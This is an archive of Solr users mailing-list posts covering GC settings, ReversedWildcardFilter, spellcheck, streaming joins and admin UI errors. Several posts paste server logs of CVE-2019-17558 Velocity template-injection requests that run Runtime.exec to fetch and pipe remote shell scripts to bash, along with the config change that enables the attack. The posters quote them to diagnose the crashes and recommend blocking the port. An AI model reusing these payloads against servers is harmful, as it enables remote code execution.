Re: CVE-2019-17558 on SOLR 6.1

2021-02-13 Thread TK Solr

(Resending to the list. Sorry, Rick.)

FYI, my client was using 8.3.1, which should have mitigated the attack.
But the server was suffering a sudden death of the Solr process, and the log 
showed it was being attacked using CVE-2019-17558.


We blocked the external access of Solr API. Then this sudden death ended. So I 
tend to think just disabling the Velocity engine might not enough.


Of course there is a possibility that this server was also getting a different 
kind of attack. We don't know.

But in general, the Solr port should be closed from external access.

TK

On 2/12/21 10:17 AM, Rick Tham wrote:

We are using Solr 6.1 and at the moment we can not upgrade due to
application dependencies.

We have mitigation steps in place to only trust specific machines within
our DMZ.

I am trying to figure out if the following is an additioanal valid
mitigation step for CVE-2019-17558 on SOLR 6.1. None of our solrconfig.xml
contains the lib references to the velocity jar files as follows:


l

It doesn't appear that you can add these jars references using the config
API. Without these references, you are not able to flip the
params.resource.loader.enabled to true using the config API. If you are not
able to flip the flag and none of your cores have these lib references then
is the risk present?

Thanks in advance!



Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document rather:

https://www.tenable.com/cve/CVE-2019-17558 
<https://www.tenable.com/cve/CVE-2019-17558>


On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's 
Solr node has been running for 4 weeks so far.  I think this security hole 
doesn't just leak the information but it can also kill the Solr process.


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's Solr 
node has been running for 4 weeks so far.  I think this security hole doesn't 
just leak the information but it can also kill the Solr process.


TK




Run multiple (different) Solr versions on a server

2021-01-25 Thread solr



Hi all,

is it possible to run multiple (different) Solr versions on a (Debian) server?
For development and production purposes I'd like to run
- a development version (Solr 8.7.0) and
- a productive version (Solr 7.4.0).
Which settings are available/necessary?

Thanks
Walter Claassen



Re: "Failed to reserve shared memory."

2021-01-07 Thread TK Solr

I added these lines to solr.in.sh and restarted Solr:

 GC_TUNE=('-XX:+UseG1GC' \
   '-XX:+PerfDisableSharedMem' \
   '-XX:+ParallelRefProcEnabled' \
   '-XX:MaxGCPauseMillis=250' \
   '-XX:+AlwaysPreTouch' \
   '-XX:+ExplicitGCInvokesConcurrent')

According to the Admin UI, -XX:+UseLargePage is gone, which is good but all 
other -XX:* except -XX:+UseG1GC are also gone.


What is the correct way to remove just -XX:UseLargePage ?

TK

On 1/6/21 3:42 PM, TK Solr wrote:
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops 
responding suddenly and they have to restart Solr.
(It is not clear if the Solr/jetty process was dead or alive but not 
responding. The OOM log isn't found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er 



which suggests removal of the JVM option -XX:+UseLargePage, which is added by 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a 
special kind of environmental variable?



TK






Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
Please disregard my previous post. I understand these are actual error messages, 
not the errors of handling Admin UI.


I think this server is being attacked using the vulnerability described here

https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

Fortunately the attack isn't succeeding because of SOLR-13971 fix, and instead 
it is causing these errors. I'll fortify the Solr access.


On 1/7/21 11:02 AM, TK Solr wrote:
On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:


Time(Local)  Level  Core Logger    Message
1/7/2021 ERROR  x:mycore loader    ResourceManager: 
unable to find resource 'custom.vm' in any resource loader.

8:41:46 AM   false
    1/7/2021 ERROR x:mycore    HttpSolrCall 
null:java.io.IOException: Unable to find resource 'custom.vm'

8:41:46 AM   false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

...

Are these errors from the Admin UI code itself? Does the Admin UI use 
Velocity? (I thought it might be a library path issue but I don't see 
'custom.vm' anywhere in the Solr source code.)



What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3.

TK





The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr

On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:

Time(Local)  Level  Core    Logger    
Message
1/7/2021 ERROR  x:mycoreloader
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
8:41:46 AM   false

1/7/2021 ERROR  x:mycoreHttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'

8:41:46 AM   false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? 
(I thought it might be a library path issue but I don't see 'custom.vm' 
anywhere in the Solr source code.)


What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3.

TK




"Failed to reserve shared memory."

2021-01-06 Thread TK Solr
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding 
suddenly and they have to restart Solr.
(It is not clear if the Solr/jetty process was dead or alive but not responding. 
The OOM log isn't found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er

which suggests removal of the JVM option -XX:+UseLargePage, which is added by 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a 
special kind of environmental variable?



TK





Java Streaming API - nested Hashjoins with zk and accesstoken

2020-11-01 Thread Anamika Solr
Hi All,

I need to combine 3 different documents using hashjoin. I am using below
query(ignore placeholder queries):

hashJoin(hashJoin(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
desc"), hashed =
select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
asc")),on="id"), hashed =
select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
asc")),on="id")

This works with simple TupleStream in java. But I also need to pass auth
token on zk. So I have to use below code:
 ZkClientClusterStateProvider zkCluster = new
ZkClientClusterStateProvider(zkHosts, null);
SolrZkClient zkServer = zkCluster.getZkStateReader().getZkClient();
StreamFactory streamFactory = new
StreamFactory().withCollectionZkHost("collectionName"),
zkServer.getZkServerAddress())
.withFunctionName("search", CloudSolrStream.class)
.withFunctionName("hashJoin", HashJoinStream.class)
.withFunctionName("select", SelectStream.class);

try (HashJoinStream hashJoinStream =
(HashJoinStream)streamFactory.constructStream(expr);){}

Issue is one hashjoin with nested select and search works fine with this
api. But the multiple hashjoin is not completing the task. I can see
expression is correctly parsed, but its waiting indefinitely to complete
the thread.

Any help is appreciated.

Thanks,
Anamika


Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

It doesn't tell much:

"debug":{ "rawquerystring":"email:*@aol.com", "querystring":"email:*@aol.com", 
"parsedquery":"(email:*@aol.com)", "parsedquery_toString":"email:*@aol.com", 
"explain":{ "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, 
"description":"email:*@aol.com"},


The email field uses ReversedWildcardFilter for both indexing and query.

On 4/15/20 12:04 PM, Erick Erickson wrote:

What do you see if you add =query? That should tell you….

Best,
Erick


On Apr 15, 2020, at 2:40 PM, TK Solr  wrote:

Thank you.

Is there any harm if I use it on the query side too? In my case it seems working OK (even 
with withOriginal="false"), and even faster.
I see the query parser code is taking a look at index analyzer and applying 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with the index-time only use of ReversedWildcardFilter and
the
both time use.

My result shows using ReverseWildcardFilter both times runs twice as fast
but my
dataset is not very large (in the order of 10k docs), so I'm not sure if I
can
make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown in ReversedWildcardFilter
<

https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>


in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the

filter

is used only for indexing.







maxPosQuestion="2"

maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>










Is it incorrect to use the same analyzer for query like?








maxPosQuestion="0"

maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>



In the description of filter, I see "Tokens without wildcards are not

reversed."

But the wildcard appears only in the query string. How can
ReversedWildcardFilter know if the wildcard is being used
if the filter is used only at the indexing time?

TK






Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

Thank you.

Is there any harm if I use it on the query side too? In my case it seems working 
OK (even with withOriginal="false"), and even faster.
I see the query parser code is taking a look at index analyzer and applying 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.


On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with the index-time only use of ReversedWildcardFilter and
the
both time use.

My result shows using ReverseWildcardFilter both times runs twice as fast
but my
dataset is not very large (in the order of 10k docs), so I'm not sure if I
can
make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown in ReversedWildcardFilter
<

https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>


in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the

filter

is used only for indexing.







maxPosQuestion="2"

maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>










Is it incorrect to use the same analyzer for query like?








maxPosQuestion="0"

maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>



In the description of filter, I see "Tokens without wildcards are not

reversed."

But the wildcard appears only in the query string. How can
ReversedWildcardFilter know if the wildcard is being used
if the filter is used only at the indexing time?

TK




Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
I experimented with the index-time only use of ReversedWildcardFilter and the 
both time use.


My result shows using ReverseWildcardFilter both times runs twice as fast but my 
dataset is not very large (in the order of 10k docs), so I'm not sure if I can 
make a conclusion.


On 4/8/20 2:49 PM, TK Solr wrote:
In the usage example shown in ReversedWildcardFilter 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> 
in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the filter 
is used only for indexing.


  positionIncrementGap="100">

    
  
  ignoreCase="true"/>

  
  maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

    
    
  
  ignoreCase="true" synonyms="synonyms.txt"/>
  ignoreCase="true"/>

  
    
  


Is it incorrect to use the same analyzer for query like?

  positionIncrementGap="100">

    
    
  
  
  maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

    
  

In the description of filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know if the wildcard is being used

if the filter is used only at the indexing time?

TK




ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
In the usage example shown in ReversedWildcardFilter 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> 
in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the filter is 
used only for indexing.


  positionIncrementGap="100">

    
  
  ignoreCase="true"/>

  
  maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

    
    
  
  ignoreCase="true" synonyms="synonyms.txt"/>
  ignoreCase="true"/>

  
    
  


Is it incorrect to use the same analyzer for query like?

  positionIncrementGap="100">

    
    
  
  
  maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

    
  

In the description of filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know if the wildcard is being used

if the filter is used only at the indexing time?

TK




Re: Spellcheck on specified fields?

2020-04-07 Thread TK Solr
Correction. "mark seattle" query doesn't show suggestions since "mark" alone has 
some hits.
It is when the same logic is used for a single term query of "seatle" that 3 
suggestions of "seattle"

are returned. Do I have to identify the field by using startOffset value?

On 4/7/20 3:46 PM, TK Solr wrote:

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true

The raw query terms are distributed to all fields because I don't know what 
term is intended to for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not 
very useful,
I would like the spellchecker to skip this and similar fields but I don't see 
a relevant

parameter in spellchecker's documentation. Is there any way to specify the
fields I am interested or I am not interested?

TK





Spellcheck on specified fields?

2020-04-07 Thread TK Solr

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true

The raw query terms are distributed to all fields because I don't know what term 
is intended to for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not very 
useful,
I would like the spellchecker to skip this and similar fields but I don't see a 
relevant

parameter in spellchecker's documentation. Is there any way to specify the
fields I am interested or I am not interested?

TK





Proper way to manage managed-schema file

2020-04-06 Thread TK Solr
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and 
modifying managed-schema.


I noticed that Solr does override this file wiping out all my comments and 
rearranging the order. I noticed there is a "DO NOT EDIT" comment. Then, what is 
the proper/expected way to manage this file? Admin UI can add fields but cannot 
edit existing one or add new field types. Do I keep a script of many schema 
calls? (Then how do I reset the default to the initial one, which would be 
needed before re-re-playing the schema calls.)


TK




Re: Admin UI core loading fails

2020-04-06 Thread TK Solr
I failed to include this line in my first post. This /select call with strange 
parameters (q=1) seems to be happening periodically even when I don't do any 
operation on Admin UI. I scanned the Solr source code, /opt/solr and 
/var/solr/data and I couldn't find the source of this call.


2020-04-04 00:41:02.604 INFO (qtp231311211-24) [   x:my_core] o.a.s.c.S.Request 
[my_core] webapp=/solr path=/select 
params={*q=1*=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} 
hits=0 status=0 QTime=1



On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was 
reported. But the newly added field type is not shown in the core's Analyzer 
section.


I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr, the core was loaded without an error and I can see the newly 
added filed type.


What could be the cause of these errors that only happens with the Reload 
button?

TK




Re: Admin UI core loading fails

2020-04-02 Thread TK Solr


On 4/2/20 5:39 AM, Erick Erickson wrote:

What do your Solr logs show? My bet is that your mods to the configs somehow 
caused the reload to fail too early in the process to be shown in the UI.


These are the lines in solr.log that I see lead to the stack trace (core name 
has been modified to my_core). I don't understand why Velocity is involved. Is 
it used by Admin UI?


2020-04-02 02:16:33.851 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to 
File System [{"update-queryresponsewriter":{

    "startup":"lazy",
    "name":"velocity",
    "class":"solr.VelocityResponseWriter",
    "template.base.dir":"",
    "solr.resource.loader.enabled":"true",
    "params.resource.loader.enabled":"true"}}]
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/config params={} status=0 QTime=487
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.SolrCore 
[my_core]  CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.SolrMetricManager Closing metric reporters for 
registry=solr.core.my_core, tag=SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.r.SolrJmxReporter Closing reporter 
[org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, 
domain = solr.core.my_core, service url = null, agent id = null] for registry 
solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a
2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) 
[   x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher 
Searcher@45a874aa[my_core] 
main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, 
os=Linux, java.version=11.0.6, 
java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, 
os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, 
source=flush, os.version=4.15.0-76-generic, 
timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))}
2020-04-02 02:16:34.105 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/select 
params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} 
hits=0 status=0 QTime=1
2020-04-02 02:16:34.106 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.PluginBag 
Going to create a new queryResponseWriter with {type = queryResponseWriter,name 
= velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.v.loader 
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] 
o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm'




Best,
Erick


On Apr 2, 2020, at 02:50, TK Solr  wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.

I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.

null:java.io.IOException: Unable to find resource 'custom.vm'
 at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
 at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
 at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
 at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
 at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
 at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
 at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle

Admin UI core loading fails

2020-04-02 Thread TK Solr

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by clicking 
Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.


I selected Logging from the side bar, I saw errors like this for every core, not 
just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr, the core was loaded without an error and I can see the newly 
added filed type.


What could be the cause of these errors that only happens with the Reload 
button?

TK




Re: Solr admin interface freezes on Chrome

2019-10-02 Thread Solr User
> Works fine on Firefox, and I
> haven't made any changes to our Solr instance (v8.1.1) in a while.

Had a co-worker with a similar issue. He had a pop-blocker enabled in
chrome that was preventing some resource call (or something similar). When
switching to Firefox everything worked without issue.  Any chance something
is showing in the developer tools console?


Solr standalone timeouts after upgrading to SOLR 7

2019-10-02 Thread Solr User
Hello all,

We recently moved to SOLR 7 from SOLR 6 about 2 weeks ago. Once each week
(including today) we experienced query timeout issues with corresponding GC
